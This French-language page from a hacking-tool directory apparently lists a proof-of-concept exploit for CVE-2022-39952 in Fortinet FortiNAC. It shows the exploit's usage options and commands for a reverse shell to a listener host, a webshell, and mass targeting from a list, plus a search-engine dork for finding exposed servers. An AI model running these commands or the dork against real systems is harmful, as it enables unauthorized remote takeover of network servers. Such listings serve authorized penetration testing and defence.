Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-39952-better — Preuve de concept d'exploitation pour CVE-2022-39952 ciblant Fortinet FortiNAC, permettant l'exécution de commandes à distance et un reverse shell sur les serveurs vulnérables. | Kitploit
Outils/GitHubGitHub/dkstar11q/cve-2022-39952-better
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubdkstar11q/cve-2022-39952-better

CVE-2022-39952-better

Preuve de concept d'exploitation pour CVE-2022-39952 ciblant Fortinet FortiNAC, permettant l'exécution de commandes à distance et un reverse shell sur les serveurs vulnérables.

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FortiNAC CVE-2022-39952

PoC pour CVE-2022-39952 affectant Fortinet FortiNAC.

Cet exploit permet à un attaquant d'exécuter des commandes arbitraires sur le serveur FortiNAC. Il est basé sur le PoC développé par horizon3ai, avec des options supplémentaires pour cibler plusieurs hôtes.

Avertissement : Cet exploit est uniquement à des fins éducatives. Veuillez l'utiliser de manière responsable et avec autorisation.

Utilisation :

root@kitploit:~
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell

Pour utiliser cet exploit, vous devez avoir Python 3.x installé sur votre système.

Prérequis :

root@kitploit:~
Python 3.x
module requests
module concurrent.futures

Exemples :

Exécuter un reverse shell sur une seule cible :

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444

Exécuter un webshell sur une seule cible :

root@kitploit:~
$ python exploit.py -t 192.168.1.100

Exécuter un webshell sur plusieurs cibles à partir d'une liste :

root@kitploit:~
$ python exploit.py -l targets.txt

Remarque :

Cet exploit n'a été testé que sur un nombre limité de cibles, son efficacité peut donc varier. Le dork pour trouver des cibles potentielles sur ZoomEye et Shodan est :

title:"FortiNAC" +"JSESSIONID"

Télécharger l’outil